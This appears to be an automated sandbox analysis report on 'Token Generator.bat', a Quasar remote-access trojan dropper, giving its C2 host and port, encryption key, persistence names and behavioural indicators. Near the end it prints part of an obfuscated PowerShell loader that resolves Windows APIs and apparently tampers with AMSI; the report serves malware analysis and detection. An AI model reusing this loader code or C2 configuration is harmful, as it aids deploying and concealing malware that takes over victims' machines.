Analysis
-
max time kernel
300s -
max time network
302s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-05-2024 20:56
Static task
static1
Behavioral task
behavioral1
Sample
Token Generator.bat
Resource
win10v2004-20240426-en
General
-
Target
Token Generator.bat
-
Size
3.5MB
-
MD5
e984ebea899379a8c0a47f9308c7370b
-
SHA1
863330006bef4c55a1bc79771ae989dc0412f717
-
SHA256
9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
-
SHA512
70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975
-
SSDEEP
49152:HgquNH3RLlp72pnTcrwIBX1F2A5LzeuUxZ3u3AnCH4El0oKYlL:HY
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
1.4.1
Token Gen
uk2.localto.net:6103
0c14e9f2-6918-4e50-8463-04ad871c1e3d
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4568-14-0x000002A947A70000-0x000002A947F0E000-memory.dmp family_quasar behavioral2/memory/1776-52-0x00000117FD2D0000-0x00000117FD5F4000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\Token Generator.exe family_quasar behavioral2/memory/1696-63-0x0000000000900000-0x0000000000C24000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3748 created 636 3748 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 1776 powershell.exe 4568 powershell.exe 3332 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 4 IoCs
Processes:
Token Generator.exeInstall.exe$77-powershell.exe$77-powershell.exepid process 1696 Token Generator.exe 4768 Install.exe 3400 $77-powershell.exe 4400 $77-powershell.exe -
Drops file in System32 directory 13 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3748 set thread context of 3024 3748 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2096 schtasks.exe 1020 schtasks.exe 4184 schtasks.exe -
Modifies data under HKEY_USERS 57 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 26 May 2024 20:58:35 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716757114" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9978C964-30BF-4865-8D88-D53FC5CFA57E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exewmiprvse.exepid process 4568 powershell.exe 4568 powershell.exe 3332 powershell.exe 3332 powershell.exe 1776 powershell.exe 1776 powershell.exe 3748 powershell.EXE 3748 powershell.EXE 3748 powershell.EXE 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 1128 wmiprvse.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe 3024 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeIncreaseQuotaPrivilege 3332 powershell.exe Token: SeSecurityPrivilege 3332 powershell.exe Token: SeTakeOwnershipPrivilege 3332 powershell.exe Token: SeLoadDriverPrivilege 3332 powershell.exe Token: SeSystemProfilePrivilege 3332 powershell.exe Token: SeSystemtimePrivilege 3332 powershell.exe Token: SeProfSingleProcessPrivilege 3332 powershell.exe Token: SeIncBasePriorityPrivilege 3332 powershell.exe Token: SeCreatePagefilePrivilege 3332 powershell.exe Token: SeBackupPrivilege 3332 powershell.exe Token: SeRestorePrivilege 3332 powershell.exe Token: SeShutdownPrivilege 3332 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeSystemEnvironmentPrivilege 3332 powershell.exe Token: SeRemoteShutdownPrivilege 3332 powershell.exe Token: SeUndockPrivilege 3332 powershell.exe Token: SeManageVolumePrivilege 3332 powershell.exe Token: 33 3332 powershell.exe Token: 34 3332 powershell.exe Token: 35 3332 powershell.exe Token: 36 3332 powershell.exe Token: SeIncreaseQuotaPrivilege 3332 powershell.exe Token: SeSecurityPrivilege 3332 powershell.exe Token: SeTakeOwnershipPrivilege 3332 powershell.exe Token: SeLoadDriverPrivilege 3332 powershell.exe Token: SeSystemProfilePrivilege 3332 powershell.exe Token: SeSystemtimePrivilege 3332 powershell.exe Token: SeProfSingleProcessPrivilege 3332 powershell.exe Token: SeIncBasePriorityPrivilege 3332 powershell.exe Token: SeCreatePagefilePrivilege 3332 powershell.exe Token: SeBackupPrivilege 3332 powershell.exe Token: SeRestorePrivilege 3332 powershell.exe Token: SeShutdownPrivilege 3332 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeSystemEnvironmentPrivilege 3332 powershell.exe Token: SeRemoteShutdownPrivilege 3332 powershell.exe Token: SeUndockPrivilege 3332 powershell.exe Token: SeManageVolumePrivilege 3332 powershell.exe Token: 33 3332 powershell.exe Token: 34 3332 powershell.exe Token: 35 3332 powershell.exe Token: 36 3332 powershell.exe Token: SeIncreaseQuotaPrivilege 3332 powershell.exe Token: SeSecurityPrivilege 3332 powershell.exe Token: SeTakeOwnershipPrivilege 3332 powershell.exe Token: SeLoadDriverPrivilege 3332 powershell.exe Token: SeSystemProfilePrivilege 3332 powershell.exe Token: SeSystemtimePrivilege 3332 powershell.exe Token: SeProfSingleProcessPrivilege 3332 powershell.exe Token: SeIncBasePriorityPrivilege 3332 powershell.exe Token: SeCreatePagefilePrivilege 3332 powershell.exe Token: SeBackupPrivilege 3332 powershell.exe Token: SeRestorePrivilege 3332 powershell.exe Token: SeShutdownPrivilege 3332 powershell.exe Token: SeDebugPrivilege 3332 powershell.exe Token: SeSystemEnvironmentPrivilege 3332 powershell.exe Token: SeRemoteShutdownPrivilege 3332 powershell.exe Token: SeUndockPrivilege 3332 powershell.exe Token: SeManageVolumePrivilege 3332 powershell.exe Token: 33 3332 powershell.exe Token: 34 3332 powershell.exe Token: 35 3332 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$77-powershell.exepid process 3400 $77-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exeToken Generator.exe$77-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 2000 wrote to memory of 4568 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 4568 2000 cmd.exe powershell.exe PID 4568 wrote to memory of 3332 4568 powershell.exe powershell.exe PID 4568 wrote to memory of 3332 4568 powershell.exe powershell.exe PID 4568 wrote to memory of 908 4568 powershell.exe WScript.exe PID 4568 wrote to memory of 908 4568 powershell.exe WScript.exe PID 908 wrote to memory of 3664 908 WScript.exe cmd.exe PID 908 wrote to memory of 3664 908 WScript.exe cmd.exe PID 3664 wrote to memory of 1776 3664 cmd.exe powershell.exe PID 3664 wrote to memory of 1776 3664 cmd.exe powershell.exe PID 1776 wrote to memory of 1696 1776 powershell.exe Token Generator.exe PID 1776 wrote to memory of 1696 1776 powershell.exe Token Generator.exe PID 1776 wrote to memory of 4768 1776 powershell.exe Install.exe PID 1776 wrote to memory of 4768 1776 powershell.exe Install.exe PID 1776 wrote to memory of 4768 1776 powershell.exe Install.exe PID 1776 wrote to memory of 2096 1776 powershell.exe schtasks.exe PID 1776 wrote to memory of 2096 1776 powershell.exe schtasks.exe PID 1696 wrote to memory of 1020 1696 Token Generator.exe schtasks.exe PID 1696 wrote to memory of 1020 1696 Token Generator.exe schtasks.exe PID 1696 wrote to memory of 3400 1696 Token Generator.exe $77-powershell.exe PID 1696 wrote to memory of 3400 1696 Token Generator.exe $77-powershell.exe PID 1776 wrote to memory of 4400 1776 powershell.exe $77-powershell.exe PID 1776 wrote to memory of 4400 1776 powershell.exe $77-powershell.exe PID 3400 wrote to memory of 4184 3400 $77-powershell.exe schtasks.exe PID 3400 wrote to memory of 4184 3400 $77-powershell.exe schtasks.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3748 wrote to memory of 3024 3748 powershell.EXE dllhost.exe PID 3024 wrote to memory of 636 3024 dllhost.exe winlogon.exe PID 3024 wrote to memory of 692 3024 dllhost.exe lsass.exe PID 3024 wrote to memory of 992 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 480 3024 dllhost.exe dwm.exe PID 3024 wrote to memory of 716 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 960 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1064 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1076 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1172 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1232 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1268 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1340 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1384 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1400 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1452 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1464 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1560 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1708 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1748 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1768 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1812 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1884 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1968 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1976 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1964 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 1852 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 2132 3024 dllhost.exe spoolsv.exe PID 3024 wrote to memory of 2272 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 2368 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 2388 3024 dllhost.exe svchost.exe PID 3024 wrote to memory of 2432 3024 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:636
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:480
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6d4fe61d-73d6-454d-b21b-7389d0b4e439}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3024
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ChlKNlpkKByZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uiNTtGhhRCBUxm,[Parameter(Position=1)][Type]$qSYxMpUFnF)$TvWeutOuTnM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+'d'+'D'+'e'+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+'e'+''+[Char](109)+'ory'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'s'+'s'+',P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'ale'+'d'+',An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$TvWeutOuTnM.DefineConstructor(''+'R'+''+'T'+''+'S'+'p'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+'Pu'+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$uiNTtGhhRCBUxm).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'me'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$TvWeutOuTnM.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'ub'+'l'+'i'+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$qSYxMpUFnF,$uiNTtGhhRCBUxm).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $TvWeutOuTnM.CreateType();}$DNWyDcAFHfcyU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+'r'+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+'t'+'.'+'W'+''+[Char](105)+'n32.'+'U'+''+[Char](110)+''+[Char](115)+'afe'+[Char](78)+'a'+[Char](116)+''+'i'+''+[Char](118)+''+'e'+''+'M'+''+'e'+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$MveFiCXPazIWBg=$DNWyDcAFHfcyU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+'A'+'d'+'d'+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+','+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qHHnUewcqgerJgKAEeM=ChlKNlpkKByZ @([String])([IntPtr]);$htlniFmKNyzoxgyyeqbyRT=ChlKNlpkKByZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GgbSbGpgXcn=$DNWyDcAFHfcyU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l32'+[Char](46)+'dl'+[Char](108)+'')));$vqxvbUIHBPcTXM=$MveFiCXPazIWBg.Invoke($Null,@([Object]$GgbSbGpgXcn,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+'ib'+'r'+''+[Char](97)+'ry'+'A'+'')));$TeOfagDmBPjdtxmlx=$MveFiCXPazIWBg.Invoke($Null,@([Object]$GgbSbGpgXcn,[Object]('V'+'i'+''+[Char](114)+'tu'+'a'+'l'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$dJGSyHL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vqxvbUIHBPcTXM,$qHHnUewcqgerJgKAEeM).Invoke('a'+[Char](109)+''+[Char](115)+